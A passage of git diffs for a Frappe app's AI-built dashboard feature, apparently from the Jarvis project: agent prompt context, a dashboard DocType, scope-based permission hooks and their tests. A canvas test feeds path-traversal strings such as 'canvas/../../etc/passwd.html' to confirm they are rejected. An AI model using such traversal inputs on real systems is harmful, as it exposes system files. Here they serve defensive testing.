+			"jarvis-dashboards skill before acting. Non-negotiable contract: produce "
+			"ONE complete self-contained HTML document per iteration and publish it as "
+			"a hosted canvas embed; no external resources. Live data sources MUST be "
+			"declared inside the HTML exactly as "
+			'<script type="application/json" id="jarvis-sources">{"sources":[{'
+			'"source_name":"<snake_case>","tool":"query|get_list|run_report",'
+			'"spec":{...}}]}</script> where spec is the SAME argument object the '
+			"matching jarvis__ tool takes (test it with that tool first); widgets "
+			'fetch with window.jarvis.data("<source_name>"). Style with the injected '
+			"--jd-* CSS variables (--jd-bg/-surface/-ink/-heading/-muted/-line/"
+			"-accent/-font) and the window.JARVIS_THEME.palette chart colors instead "
+			"of hardcoding design; only deviate when the user explicitly asks about "
+			f"the look.{mode_line}]"
 			f"\n\n{user_message}"
 		)
 	if context.get("page") == "triggers":

--- a/jarvis/chat/turn_handler.py
+++ b/jarvis/chat/turn_handler.py
@@ -1190,6 +1190,15 @@ def _prepend_doc_context(user_message: str, context) -> str:
 			)
 		else:
 			mode_line = ""
+		# When revising a saved dashboard, name it so the agent reads the current
+		# document before changing it (instead of building blind).
+		edit_line = ""
+		if (context.get("doctype") or "") == "Jarvis Dashboard" and context.get("name"):
+			edit_line = (
+				f" They are revising the saved dashboard {context['name']} — call "
+				f"jarvis__get_doc on Jarvis Dashboard {context['name']} to read its "
+				"current html and sources, then produce the full revised document."
+			)
 		return (
 			"[Context: The user is on the Jarvis Dashboards builder page. They want to "
 			"create or iterate on a dashboard/report. Read and follow the "
@@ -1208,7 +1217,7 @@ def _prepend_doc_context(user_message: str, context) -> str:
 			"--jd-* CSS variables (--jd-bg/-surface/-ink/-heading/-muted/-line/"
 			"-accent/-font) and the window.JARVIS_THEME.palette chart colors instead "
 			"of hardcoding design; only deviate when the user explicitly asks about "
-			f"the look.{mode_line}]"
+			f"the look.{mode_line}{edit_line}]"
 			f"\n\n{user_message}"
 		)
 	if context.get("page") == "triggers":

--- a/jarvis/hooks.py
+++ b/jarvis/hooks.py
@@ -523,3 +523,19 @@ has_permission.update({
 	"Jarvis Trigger": "jarvis.chat.trigger_permissions.has_trigger_permission",
 })
 
+# ---------------------------------------------------------------------------
+# Jarvis Dashboard scoping
+# ---------------------------------------------------------------------------
+# The doctype rows grant Jarvis User r/w/c/d broadly; these hooks scope reads
+# to the dashboard's audience (Org / Role / User / owner — blank scope is
+# PRIVATE) and deny writes/deletes to everyone but the owner and the admin
+# tier. The create-time scope-widening gate (plain users may not create
+# Org/Role dashboards) lives in the DocType controller — "create" reaches the
+# hook without a doc.
+permission_query_conditions.update({
+	"Jarvis Dashboard": "jarvis.chat.dashboard_permissions.dashboard_query_conditions",
+})
+has_permission.update({
+	"Jarvis Dashboard": "jarvis.chat.dashboard_permissions.has_dashboard_permission",
+})
+

--- a/jarvis/jarvis/doctype/jarvis_dashboard/jarvis_dashboard.json
+++ b/jarvis/jarvis/doctype/jarvis_dashboard/jarvis_dashboard.json
@@ -9,6 +9,7 @@
   "dashboard_title",
   "description",
   "dashboard_type",
+  "theme",
   "scope",
   "target_role",
   "target_user",
@@ -39,6 +40,14 @@
    "default": "Static",
    "in_standard_filter": 1,
    "description": "Derived server-side: Connected when the dashboard declares data sources (live data at view time), Static otherwise. Never set directly."
+  },
+  {
+   "fieldname": "theme",
+   "fieldtype": "Select",
+   "label": "Theme",
+   "options": "Jarvis\nInsight\nClaude\nGraphite",
+   "default": "Jarvis",
+   "description": "Named render theme injected by the canvas shell as CSS variables. Jarvis = the app's own design language (default), Insight = Frappe-Insights-style light, Claude = warm ivory, Graphite = dark."
   },
   {
    "fieldname": "scope",

--- a/jarvis/jarvis/doctype/jarvis_dashboard/jarvis_dashboard.json
+++ b/jarvis/jarvis/doctype/jarvis_dashboard/jarvis_dashboard.json
@@ -1,0 +1,128 @@
+{
+ "actions": [],
+ "allow_rename": 0,
+ "autoname": "hash",
+ "creation": "2026-07-17 09:00:00.000000",
+ "doctype": "DocType",
+ "engine": "InnoDB",
+ "field_order": [
+  "dashboard_title",
+  "description",
+  "dashboard_type",
+  "scope",
+  "target_role",
+  "target_user",
+  "html",
+  "sources",
+  "source_conversation"
+ ],
+ "fields": [
+  {
+   "fieldname": "dashboard_title",
+   "fieldtype": "Data",
+   "label": "Dashboard Title",
+   "reqd": 1,
+   "in_list_view": 1,
+   "description": "Short name shown in the Dashboards list, e.g. 'Monthly Sales Overview'."
+  },
+  {
+   "fieldname": "description",
+   "fieldtype": "Small Text",
+   "label": "Description",
+   "description": "Optional one-line summary of what this dashboard shows."
+  },
+  {
+   "fieldname": "dashboard_type",
+   "fieldtype": "Select",
+   "label": "Dashboard Type",
+   "options": "Static\nConnected",
+   "default": "Static",
+   "in_standard_filter": 1,
+   "description": "Derived server-side: Connected when the dashboard declares data sources (live data at view time), Static otherwise. Never set directly."
+  },
+  {
+   "fieldname": "scope",
+   "fieldtype": "Select",
+   "label": "Scope",
+   "options": "Org\nRole\nUser",
+   "reqd": 1,
+   "default": "User",
+   "in_standard_filter": 1,
+   "description": "Who can see this dashboard: everyone (Org), holders of a role (Role), or one user (User). Org/Role require the Jarvis Admin tier."
+  },
+  {
+   "fieldname": "target_role",
+   "fieldtype": "Link",
+   "options": "Role",
+   "label": "Target Role",
+   "depends_on": "eval:doc.scope=='Role'",
+   "mandatory_depends_on": "eval:doc.scope=='Role'",
+   "description": "Role whose holders can see this dashboard (Role scope only)."
+  },
+  {
+   "fieldname": "target_user",
+   "fieldtype": "Link",
+   "options": "User",
+   "label": "Target User",
+   "depends_on": "eval:doc.scope=='User'",
+   "description": "The single user this dashboard belongs to (User scope; defaults to the owner)."
+  },
+  {
+   "fieldname": "html",
+   "fieldtype": "Code",
+   "options": "HTML",
+   "label": "HTML",
+   "description": "The full self-contained HTML document the dashboard renders (no external resources; data via window.jarvis.data())."
+  },
+  {
+   "fieldname": "sources",
+   "fieldtype": "Table",
+   "options": "Jarvis Dashboard Source",
+   "label": "Data Sources",
+   "description": "Declared data sources served live at view time as the viewing user."
+  },
+  {
+   "fieldname": "source_conversation",
+   "fieldtype": "Data",
+   "label": "Source Conversation",
+   "hidden": 1,
+   "description": "Provenance: the Jarvis conversation id when this dashboard was created via chat."
+  }
+ ],
+ "index_web_pages_for_search": 0,
+ "links": [],
+ "modified": "2026-07-17 09:00:00.000000",
+ "modified_by": "Administrator",
+ "module": "Jarvis",
+ "name": "Jarvis Dashboard",
+ "naming_rule": "Random",
+ "owner": "Administrator",
+ "permissions": [
+  {
+   "create": 1,
+   "delete": 1,
+   "read": 1,
+   "role": "System Manager",
+   "write": 1
+  },
+  {
+   "create": 1,
+   "delete": 1,
+   "read": 1,
+   "role": "Jarvis Admin",
+   "write": 1
+  },
+  {
+   "create": 1,
+   "delete": 1,
+   "read": 1,
+   "role": "Jarvis User",
+   "write": 1
+  }
+ ],
+ "sort_field": "modified",
+ "sort_order": "DESC",
+ "states": [],
+ "title_field": "dashboard_title",
+ "track_changes": 1
+}

--- a/jarvis/jarvis/doctype/jarvis_dashboard/jarvis_dashboard.py
+++ b/jarvis/jarvis/doctype/jarvis_dashboard/jarvis_dashboard.py
@@ -81,7 +81,11 @@ class JarvisDashboard(Document):
 			frappe.throw(_("Scope must be one of Org, Role or User."))
 		if self.scope == "User":
 			self.target_role = None
-			self.target_user = self.target_user or self.owner or frappe.session.user
+			# Pin to the owner — NEVER honor a client-supplied target_user. The SPA
+			# never sends it, but a direct REST/Desk write could otherwise set
+			# target_user to an arbitrary victim, pushing this dashboard into that
+			# user's visible list (visible_scope_condition matches target_user).
+			self.target_user = self.owner or frappe.session.user
 		elif self.scope == "Role":
 			self.target_user = None
 			if not self.target_role:

--- a/jarvis/jarvis/doctype/jarvis_dashboard/jarvis_dashboard.py
+++ b/jarvis/jarvis/doctype/jarvis_dashboard/jarvis_dashboard.py
@@ -39,12 +39,14 @@ MAX_SOURCES = 12
 MAX_SPEC_CHARS = 32_000
 
 _SCOPES = ("Org", "Role", "User")
+_THEMES = ("Jarvis", "Insight", "Claude", "Graphite")
 _SOURCE_NAME_RE = re.compile(r"^[a-zA-Z0-9_-]{1,64}$")
 
 
 class JarvisDashboard(Document):
 	def validate(self):
 		self._validate_title()
+		self._validate_theme()
 		self._validate_scope()
 		self._validate_caps()
 		self._validate_sources()
@@ -61,6 +63,11 @@ class JarvisDashboard(Document):
 			frappe.throw(_("Dashboard title is required."))
 		if len(self.dashboard_title) > MAX_TITLE_LEN:
 			frappe.throw(_("Dashboard title must be at most {0} characters.").format(MAX_TITLE_LEN))
+
+	def _validate_theme(self):
+		self.theme = (self.theme or "").strip() or "Jarvis"
+		if self.theme not in _THEMES:
+			frappe.throw(_("Theme must be one of {0}.").format(", ".join(_THEMES)))
 
 	def _validate_scope(self):
 		"""Scope normalization + the SCOPE-WIDENING GATE.

--- a/jarvis/jarvis/doctype/jarvis_dashboard/jarvis_dashboard.py
+++ b/jarvis/jarvis/doctype/jarvis_dashboard/jarvis_dashboard.py
@@ -1,0 +1,143 @@
+"""Jarvis Dashboard DocType controller.
+
+A dashboard is one self-contained HTML document (``html``) plus zero or more
+declared data sources (``sources`` child rows). All user-facing validation
+lives here so it runs on every insert/save whether the write came from the SPA
+API (``jarvis.chat.dashboards_api``), the Desk, chat's doc tools, or a test —
+mirroring ``Jarvis Trigger``.
+
+Enforced here (NOT in the has_permission hook — "create" reaches the hook
+without a doc, so a scope gate there would be bypassable on insert):
+
+  * scope normalization + target field consistency (User -> target_user
+    defaults to the owner; Role -> target_role required; Org -> both cleared).
+  * SCOPE-WIDENING GATE: Org/Role scope needs the Jarvis Admin tier, and a
+    Role scope must target a role the author may manage
+    (``dashboard_permissions.manageable_roles``).
+  * caps: html size, source count, per-source spec size.
+  * per-source validation (name charset/uniqueness here; tool + spec shape via
+    ``dashboards_api._validate_source_row``).
+  * ``dashboard_type`` derivation: sources present -> Connected, else Static.
+
+Read/write visibility is the "grant + deny-hook" shape used by Jarvis Trigger:
+the doctype rows grant Jarvis User r/w/c/d broadly and
+``jarvis.chat.dashboard_permissions`` denies at the ORM (non-owner writes,
+out-of-scope reads).
+"""
+
+import re
+
+import frappe
+from frappe import _
+from frappe.model.document import Document
+
+from jarvis.permissions import has_jarvis_admin_access
+
+MAX_TITLE_LEN = 140
+MAX_HTML_CHARS = 1_000_000
+MAX_SOURCES = 12
+MAX_SPEC_CHARS = 32_000
+
+_SCOPES = ("Org", "Role", "User")
+_SOURCE_NAME_RE = re.compile(r"^[a-zA-Z0-9_-]{1,64}$")
+
+
+class JarvisDashboard(Document):
+	def validate(self):
+		self._validate_title()
+		self._validate_scope()
+		self._validate_caps()
+		self._validate_sources()
+		# Derived, never author-set: the html contract is "declared sources ->
+		# live data at view time", so the type simply reflects the sources table.
+		self.dashboard_type = "Connected" if (self.sources or []) else "Static"
+
+	# ------------------------------------------------------------------ #
+	# validate
+	# ------------------------------------------------------------------ #
+	def _validate_title(self):
+		self.dashboard_title = (self.dashboard_title or "").strip()
+		if not self.dashboard_title:
+			frappe.throw(_("Dashboard title is required."))
+		if len(self.dashboard_title) > MAX_TITLE_LEN:
+			frappe.throw(_("Dashboard title must be at most {0} characters.").format(MAX_TITLE_LEN))
+
+	def _validate_scope(self):
+		"""Scope normalization + the SCOPE-WIDENING GATE.
+
+		The gate must live here, not in the has_permission hook: "create" has
+		no doc when the hook runs, so a hook-side gate could never see the
+		scope being created. Runs as the SESSION user — exactly the actor
+		performing the write."""
+		self.scope = (self.scope or "").strip() or "User"
+		if self.scope not in _SCOPES:
+			frappe.throw(_("Scope must be one of Org, Role or User."))
+		if self.scope == "User":
+			self.target_role = None
+			self.target_user = self.target_user or self.owner or frappe.session.user
+		elif self.scope == "Role":
+			self.target_user = None
+			if not self.target_role:
+				frappe.throw(_("Target role is required for a Role-scoped dashboard."))
+		else:  # Org
+			self.target_role = None
+			self.target_user = None
+
+		if self.scope in ("Org", "Role") and not has_jarvis_admin_access():
+			frappe.throw(
+				_(
+					"You need the Jarvis Admin or System Manager role to share a "
+					"dashboard org-wide or with a role."
+				),
+				frappe.PermissionError,
+			)
+		if self.scope == "Role":
+			from jarvis.chat.dashboard_permissions import manageable_roles
+
+			if self.target_role not in manageable_roles():
+				frappe.throw(
+					_("You cannot target the role '{0}' with a dashboard.").format(
+						self.target_role
+					)
+				)
+
+	def _validate_caps(self):
+		if len(self.html or "") > MAX_HTML_CHARS:
+			frappe.throw(
+				_("Dashboard HTML must be at most {0} characters.").format(MAX_HTML_CHARS)
+			)
+		if len(self.sources or []) > MAX_SOURCES:
+			frappe.throw(
+				_("A dashboard can declare at most {0} data sources.").format(MAX_SOURCES)
+			)
+
+	def _validate_sources(self):
+		"""Name charset + uniqueness here; tool/spec shape per row via the API
+		module's ``_validate_source_row`` (single source of truth shared with
+		``save_dashboard``). Lazy import — the API module imports nothing from
+		this controller, but keeping the import call-time avoids any future
+		module-load cycle."""
+		from jarvis.chat.dashboards_api import _validate_source_row
+
+		seen: set = set()
+		for row in self.sources or []:
+			row.source_name = (row.source_name or "").strip()
+			if not _SOURCE_NAME_RE.match(row.source_name):
+				frappe.throw(
+					_(
+						"Invalid source name '{0}': use 1-64 letters, digits, "
+						"underscores or hyphens."
+					).format(row.source_name)
+				)
+			if row.source_name in seen:
+				frappe.throw(_("Duplicate source name: {0}").format(row.source_name))
+			seen.add(row.source_name)
+			if len(row.spec or "") > MAX_SPEC_CHARS:
+				frappe.throw(
+					_("Source '{0}': spec must be at most {1} characters.").format(
+						row.source_name, MAX_SPEC_CHARS
+					)
+				)
+			_validate_source_row(
+				{"source_name": row.source_name, "tool": row.tool, "spec": row.spec}
+			)

--- a/jarvis/jarvis/doctype/jarvis_dashboard_source/jarvis_dashboard_source.json
+++ b/jarvis/jarvis/doctype/jarvis_dashboard_source/jarvis_dashboard_source.json
@@ -1,0 +1,41 @@
+{
+ "doctype": "DocType",
+ "name": "Jarvis Dashboard Source",
+ "module": "Jarvis",
+ "istable": 1,
+ "custom": 0,
+ "engine": "InnoDB",
+ "field_order": [
+  "source_name",
+  "tool",
+  "spec"
+ ],
+ "fields": [
+  {
+   "fieldname": "source_name",
+   "fieldtype": "Data",
+   "label": "Source Name",
+   "reqd": 1,
+   "in_list_view": 1,
+   "description": "Identifier the dashboard HTML uses to request this source's rows (window.jarvis.data(name)). Letters, digits, _ and - only."
+  },
+  {
+   "fieldname": "tool",
+   "fieldtype": "Select",
+   "label": "Tool",
+   "reqd": 1,
+   "in_list_view": 1,
+   "options": "query\nrun_report\nget_list",
+   "description": "Which read tool serves this source at view time (always as the viewing user)."
+  },
+  {
+   "fieldname": "spec",
+   "fieldtype": "Code",
+   "options": "JSON",
+   "label": "Spec",
+   "reqd": 1,
+   "description": "JSON spec for the tool: a structured query spec, {doctype, fields, filters, ...} for get_list, or {report_name, filters} for run_report."
+  }
+ ],
+ "permissions": []
+}

--- a/jarvis/jarvis/doctype/jarvis_dashboard_source/jarvis_dashboard_source.py
+++ b/jarvis/jarvis/doctype/jarvis_dashboard_source/jarvis_dashboard_source.py
@@ -1,0 +1,10 @@
+"""Jarvis Dashboard Source — child row of Jarvis Dashboard (one declared data
+source: name + tool + JSON spec). Validation lives in the parent controller so
+every row is checked in dashboard context (caps, name uniqueness, per-tool spec
+shape)."""
+
+from frappe.model.document import Document
+
+
+class JarvisDashboardSource(Document):
+	pass

--- a/jarvis/tests/test_canvas_embeds.py
+++ b/jarvis/tests/test_canvas_embeds.py
@@ -1,0 +1,69 @@
+"""Hosted-embed marker support in the chat canvas pipeline.
+
+openclaw 2026.6+ teaches the model to publish rich HTML as hosted canvas
+documents referenced by ``[embed ref="<id>" /]`` markers (or an explicit
+``/__openclaw__/canvas/...`` url). These must resolve to the same gateway
+fetch path as plain ``canvas/<path>.<ext>`` references, and the markers must
+be stripped from the visible reply once the artifact is persisted.
+"""
+
+from frappe.tests.utils import FrappeTestCase
+
+from jarvis.chat.canvas import detect_canvas_names, strip_canvas_refs
+
+
+class TestCanvasEmbedDetection(FrappeTestCase):
+	def test_embed_ref_maps_to_document_path(self):
+		text = 'Done.\n\n[embed ref="sales-dash-abc123" title="Sales" height="720" /]'
+		self.assertEqual(
+			detect_canvas_names(text), ["documents/sales-dash-abc123/index.html"]
+		)
+
+	def test_embed_url_form_detected_via_canvas_path(self):
+		text = '[embed url="/__openclaw__/canvas/documents/cv_9/index.html" title="X" /]'
+		self.assertEqual(detect_canvas_names(text), ["documents/cv_9/index.html"])
+
+	def test_plain_canvas_path_still_detected_and_deduped(self):
+		text = (
+			"See canvas/charts/foo.html and again canvas/charts/foo.html plus "
+			'[embed ref="bar" /]'
+		)
+		self.assertEqual(
+			detect_canvas_names(text),
+			["charts/foo.html", "documents/bar/index.html"],
+		)
+
+	def test_single_quoted_ref(self):
+		self.assertEqual(
+			detect_canvas_names("[embed ref='q-1' /]"),
+			["documents/q-1/index.html"],
+		)
+
+	def test_cap_still_applies(self):
+		text = "\n".join(f'[embed ref="d{i}" /]' for i in range(12))
+		self.assertEqual(len(detect_canvas_names(text)), 8)
+
+
+class TestCanvasEmbedStripping(FrappeTestCase):
+	def test_persisted_ref_marker_removed(self):
+		text = 'Built it.\n\n[embed ref="sales-1" title="Sales" height="720" /]'
+		out = strip_canvas_refs(text, ["documents/sales-1/index.html"])
+		self.assertEqual(out, "Built it.")
+
+	def test_unpersisted_marker_kept(self):
+		text = 'Built it. [embed ref="other" /]'
+		out = strip_canvas_refs(text, ["documents/sales-1/index.html"])
+		self.assertIn('[embed ref="other" /]', out)
+
+	def test_url_form_marker_removed_without_residue(self):
+		text = 'Done [embed url="/__openclaw__/canvas/documents/cv_9/index.html" title="X" /] end'
+		out = strip_canvas_refs(text, ["documents/cv_9/index.html"])
+		self.assertNotIn("[embed", out)
+		self.assertNotIn("cv_9", out)
+		self.assertIn("Done", out)
+		self.assertIn("end", out)
+
+	def test_plain_path_strip_unchanged(self):
+		text = "Chart at canvas/charts/foo.html for you"
+		out = strip_canvas_refs(text, ["charts/foo.html"])
+		self.assertNotIn("canvas/", out)

--- a/jarvis/tests/test_canvas_embeds.py
+++ b/jarvis/tests/test_canvas_embeds.py
@@ -67,3 +67,18 @@ class TestCanvasEmbedStripping(FrappeTestCase):
 		text = "Chart at canvas/charts/foo.html for you"
 		out = strip_canvas_refs(text, ["charts/foo.html"])
 		self.assertNotIn("canvas/", out)
+
+
+class TestHostClientStripping(FrappeTestCase):
+	def test_host_socket_script_removed_others_kept(self):
+		from jarvis.chat.canvas import _strip_host_client
+
+		html = (
+			"<html><body><script>renderChart()</script>"
+			'<script>\nconst ws = new WebSocket("ws://" + location.host + "/__openclaw__/ws");\n</script>'
+			"</body></html>"
+		)
+		out = _strip_host_client(html)
+		self.assertIn("renderChart()", out)
+		self.assertNotIn("__openclaw__/ws", out)
+		self.assertNotIn("WebSocket", out)

--- a/jarvis/tests/test_canvas_embeds.py
+++ b/jarvis/tests/test_canvas_embeds.py
@@ -82,3 +82,14 @@ class TestHostClientStripping(FrappeTestCase):
 		self.assertIn("renderChart()", out)
 		self.assertNotIn("__openclaw__/ws", out)
 		self.assertNotIn("WebSocket", out)
+
+
+class TestCanvasPathTraversal(FrappeTestCase):
+	def test_dotdot_traversal_rejected(self):
+		self.assertEqual(detect_canvas_names("see canvas/../../etc/passwd.html now"), [])
+
+	def test_dotdot_mid_path_rejected(self):
+		self.assertEqual(detect_canvas_names("canvas/charts/../../secret.html"), [])
+
+	def test_legit_subdir_still_ok(self):
+		self.assertEqual(detect_canvas_names("canvas/charts/sales.html"), ["charts/sales.html"])

--- a/jarvis/tests/test_dashboard_permissions.py
+++ b/jarvis/tests/test_dashboard_permissions.py
@@ -1,0 +1,299 @@
+"""Tests for jarvis.chat.dashboard_permissions + the Jarvis Dashboard
+controller's scope gate.
+
+Fixture users: a Jarvis Admin, two plain jarvis users, one plain user holding
+a custom test role, plus Administrator as the SM tier. Hermetic: every
+dashboard created here is tracked and deleted in tearDown.
+"""
+
+import frappe
+from frappe.tests.utils import FrappeTestCase
+
+from jarvis.chat.dashboard_permissions import (
+	can_edit_dashboard,
+	can_read_dashboard,
+	creatable_scopes,
+	has_dashboard_permission,
+	manageable_roles,
+)
+from jarvis.exceptions import PermissionDeniedError
+from jarvis.permissions import (
+	JARVIS_ADMIN_ROLE,
+	JARVIS_USER_ROLE,
+	ensure_jarvis_admin_role,
+	ensure_jarvis_user_role,
+)
+from jarvis.tools.get_doc import get_doc as tool_get_doc
+
+DASHBOARD = "Jarvis Dashboard"
+
+ADMIN_USER = "jarvis-dash-admin@example.com"
+PLAIN_A = "jarvis-dash-user-a@example.com"
+PLAIN_B = "jarvis-dash-user-b@example.com"
+ROLE_USER = "jarvis-dash-roleholder@example.com"
+CUSTOM_ROLE = "Jarvis Dash Test Role"
+
+
+def _ensure_user(email: str, roles: list[str]) -> None:
+	"""Create the fixture user if missing; idempotent."""
+	if not frappe.db.exists("User", email):
+		frappe.get_doc({
+			"doctype": "User",
+			"email": email,
+			"first_name": "Dash",
+			"last_name": "Test",
+			"enabled": 1,
+			"send_welcome_email": 0,
+			"user_type": "System User",
+		}).insert(ignore_permissions=True)
+	doc = frappe.get_doc("User", email)
+	doc.add_roles(*roles)
+	frappe.db.commit()
+
+
+def _ensure_custom_role() -> None:
+	if not frappe.db.exists("Role", CUSTOM_ROLE):
+		frappe.get_doc({
+			"doctype": "Role",
+			"role_name": CUSTOM_ROLE,
+			"desk_access": 1,
+			"is_custom": 1,
+		}).insert(ignore_permissions=True)
+
+
+class _DashboardPermTestCase(FrappeTestCase):
+	def setUp(self):
+		ensure_jarvis_user_role()
+		ensure_jarvis_admin_role()
+		_ensure_custom_role()
+		_ensure_user(ADMIN_USER, [JARVIS_ADMIN_ROLE, JARVIS_USER_ROLE, CUSTOM_ROLE])
+		_ensure_user(PLAIN_A, [JARVIS_USER_ROLE])
+		_ensure_user(PLAIN_B, [JARVIS_USER_ROLE])
+		_ensure_user(ROLE_USER, [JARVIS_USER_ROLE, CUSTOM_ROLE])
+		self._orig_user = frappe.session.user
+		self._dashboards: list[str] = []
+
+	def tearDown(self):
+		frappe.set_user(self._orig_user)
+		for name in self._dashboards:
+			if frappe.db.exists(DASHBOARD, name):
+				frappe.delete_doc(DASHBOARD, name, ignore_permissions=True, force=True)
+		frappe.db.commit()
+
+	def _mk(self, scope: str = "User", owner: str | None = None, **kw) -> str:
+		"""Create a dashboard as Administrator (passes every gate); optionally
+		force the owner afterwards (set_user_and_timestamp always stamps the
+		session user on insert, so a foreign owner can only be simulated with a
+		direct db write — validate is not the subject there)."""
+		prev = frappe.session.user
+		frappe.set_user("Administrator")
+		try:
+			doc = frappe.get_doc({
+				"doctype": DASHBOARD,
+				"dashboard_title": kw.pop(
+					"dashboard_title", f"perm-{frappe.generate_hash(length=8)}"
+				),
+				"scope": scope,
+				"html": "<h1>t</h1>",
+				**kw,
+			}).insert()
+			self._dashboards.append(doc.name)
+			if owner:
+				frappe.db.set_value(
+					DASHBOARD, doc.name, "owner", owner, update_modified=False
+				)
+			frappe.db.commit()
+			return doc.name
+		finally:
+			frappe.set_user(prev)
+
+	def _doc(self, name: str):
+		return frappe.get_doc(DASHBOARD, name)
+
+	def _visible_names(self, user: str, names: list[str]) -> set:
+		frappe.set_user(user)
+		rows = frappe.get_list(
+			DASHBOARD, filters={"name": ["in", names]}, pluck="name"
+		)
+		return set(rows)
+
+
+class TestReadMatrix(_DashboardPermTestCase):
+	def test_org_visible_to_all_jarvis_users(self):
+		name = self._mk("Org")
+		doc = self._doc(name)
+		for user in (PLAIN_A, PLAIN_B, ROLE_USER, ADMIN_USER):
+			self.assertTrue(can_read_dashboard(doc, user), user)
+
+	def test_role_visible_only_to_role_holder_and_admins(self):
+		name = self._mk("Role", target_role=CUSTOM_ROLE)
+		doc = self._doc(name)
+		self.assertTrue(can_read_dashboard(doc, ROLE_USER))
+		self.assertTrue(can_read_dashboard(doc, ADMIN_USER))
+		self.assertFalse(can_read_dashboard(doc, PLAIN_A))
+		self.assertFalse(can_read_dashboard(doc, PLAIN_B))
+
+	def test_user_scope_visible_only_to_target_and_admins(self):
+		name = self._mk("User", target_user=PLAIN_A, owner=PLAIN_A)
+		doc = self._doc(name)
+		self.assertTrue(can_read_dashboard(doc, PLAIN_A))
+		self.assertTrue(can_read_dashboard(doc, ADMIN_USER))
+		self.assertFalse(can_read_dashboard(doc, PLAIN_B))
+		self.assertFalse(can_read_dashboard(doc, ROLE_USER))
+
+	def test_owner_reads_own_role_scoped_without_holding_role(self):
+		# PLAIN_A does NOT hold CUSTOM_ROLE but owns the dashboard.
+		name = self._mk("Role", target_role=CUSTOM_ROLE, owner=PLAIN_A)
+		doc = self._doc(name)
+		self.assertTrue(can_read_dashboard(doc, PLAIN_A))
+		self.assertIn(name, self._visible_names(PLAIN_A, [name]))
+		self.assertFalse(can_read_dashboard(doc, PLAIN_B))
+
+	def test_blank_scope_is_private_not_org(self):
+		name = self._mk("User", target_user=PLAIN_A, owner=PLAIN_A)
+		# Simulate a row that lost its scope (validate would never produce it).
+		frappe.db.set_value(DASHBOARD, name, "scope", "", update_modified=False)
+		frappe.db.commit()
+		doc = self._doc(name)
+		self.assertTrue(can_read_dashboard(doc, PLAIN_A))  # owner + target_user
+		self.assertFalse(can_read_dashboard(doc, PLAIN_B))
+		self.assertFalse(can_read_dashboard(doc, ROLE_USER))
+		self.assertNotIn(name, self._visible_names(PLAIN_B, [name]))
+
+	def test_sm_reads_all(self):
+		names = [
+			self._mk("Org"),
+			self._mk("Role", target_role=CUSTOM_ROLE),
+			self._mk("User", target_user=PLAIN_A, owner=PLAIN_A),
+		]
+		for n in names:
+			self.assertTrue(can_read_dashboard(self._doc(n), "Administrator"))
+		self.assertEqual(self._visible_names("Administrator", names), set(names))
+
+	def test_get_list_hook_parity(self):
+		org = self._mk("Org")
+		role = self._mk("Role", target_role=CUSTOM_ROLE)
+		private_a = self._mk("User", target_user=PLAIN_A, owner=PLAIN_A)
+		names = [org, role, private_a]
+		self.assertEqual(self._visible_names(PLAIN_A, names), {org, private_a})
+		self.assertEqual(self._visible_names(ROLE_USER, names), {org, role})
+		self.assertEqual(self._visible_names(PLAIN_B, names), {org})
+		self.assertEqual(self._visible_names(ADMIN_USER, names), set(names))
+
+
+class TestWriteMatrix(_DashboardPermTestCase):
+	def test_write_matrix(self):
+		name = self._mk("User", target_user=PLAIN_A, owner=PLAIN_A)
+		doc = self._doc(name)
+		self.assertTrue(can_edit_dashboard(doc, PLAIN_A))
+		self.assertFalse(can_edit_dashboard(doc, PLAIN_B))
+		self.assertTrue(can_edit_dashboard(doc, ADMIN_USER))
+		# ORM enforcement: a non-owner write is denied by the hook.
+		frappe.set_user(PLAIN_B)
+		foreign = frappe.get_doc(DASHBOARD, name)
+		foreign.description = "hijack"
+		self.assertRaises(frappe.PermissionError, foreign.save)
+		# The owner's write goes through.
+		frappe.set_user(PLAIN_A)
+		mine = frappe.get_doc(DASHBOARD, name)
+		mine.description = "mine"
+		mine.save()
+		self.assertEqual(
+			frappe.db.get_value(DASHBOARD, name, "description"), "mine"
+		)
+
+	def test_delete_matrix(self):
+		name = self._mk("User", target_user=PLAIN_A, owner=PLAIN_A)
+		doc = self._doc(name)
+		self.assertFalse(has_dashboard_permission(doc, "delete", PLAIN_B))
+		self.assertTrue(has_dashboard_permission(doc, "delete", PLAIN_A))
+		self.assertTrue(has_dashboard_permission(doc, "delete", ADMIN_USER))
+		frappe.set_user(PLAIN_B)
+		self.assertRaises(frappe.PermissionError, frappe.delete_doc, DASHBOARD, name)
+		frappe.set_user(PLAIN_A)
+		frappe.delete_doc(DASHBOARD, name)
+		self.assertFalse(frappe.db.exists(DASHBOARD, name))
+
+	def test_tool_get_doc_denied_on_private_dashboard(self):
+		# The chat-referral path: another user asking the agent to open a
+		# private dashboard must hit the permission wall in jarvis.tools.
+		name = self._mk("User", target_user=PLAIN_A, owner=PLAIN_A)
+		frappe.set_user(PLAIN_B)
+		self.assertRaises(
+			PermissionDeniedError, tool_get_doc, DASHBOARD, name
+		)
+		frappe.clear_messages()
+
+
+class TestScopeHelpers(_DashboardPermTestCase):
+	def test_creatable_scopes_matrix(self):
+		self.assertEqual(creatable_scopes(PLAIN_A), ["User"])
+		self.assertEqual(creatable_scopes(ADMIN_USER), ["Org", "Role", "User"])
+		self.assertEqual(creatable_scopes("Administrator"), ["Org", "Role", "User"])
+
+	def test_manageable_roles(self):
+		sm_roles = manageable_roles("Administrator")
+		self.assertIn(CUSTOM_ROLE, sm_roles)
+		for blocked in ("System Manager", "All", "Guest", JARVIS_USER_ROLE, JARVIS_ADMIN_ROLE):
+			self.assertNotIn(blocked, sm_roles)
+		admin_roles = manageable_roles(ADMIN_USER)
+		self.assertIn(CUSTOM_ROLE, admin_roles)
+		self.assertNotIn(JARVIS_ADMIN_ROLE, admin_roles)
+		self.assertNotIn(JARVIS_USER_ROLE, admin_roles)
+		self.assertEqual(manageable_roles(PLAIN_A), [])
+
+
+class TestControllerScopeGate(_DashboardPermTestCase):
+	def test_plain_user_cannot_create_org_dashboard(self):
+		frappe.set_user(PLAIN_A)
+		doc = frappe.get_doc({
+			"doctype": DASHBOARD,
+			"dashboard_title": f"gate-{frappe.generate_hash(length=8)}",
+			"scope": "Org",
+			"html": "<h1>x</h1>",
+		})
+		self.assertRaises(frappe.PermissionError, doc.insert)
+
+	def test_plain_user_cannot_widen_own_to_role(self):
+		frappe.set_user(PLAIN_A)
+		doc = frappe.get_doc({
+			"doctype": DASHBOARD,
+			"dashboard_title": f"gate-{frappe.generate_hash(length=8)}",
+			"scope": "User",
+			"html": "<h1>x</h1>",
+		}).insert()
+		self._dashboards.append(doc.name)
+		doc.scope = "Role"
+		doc.target_role = CUSTOM_ROLE
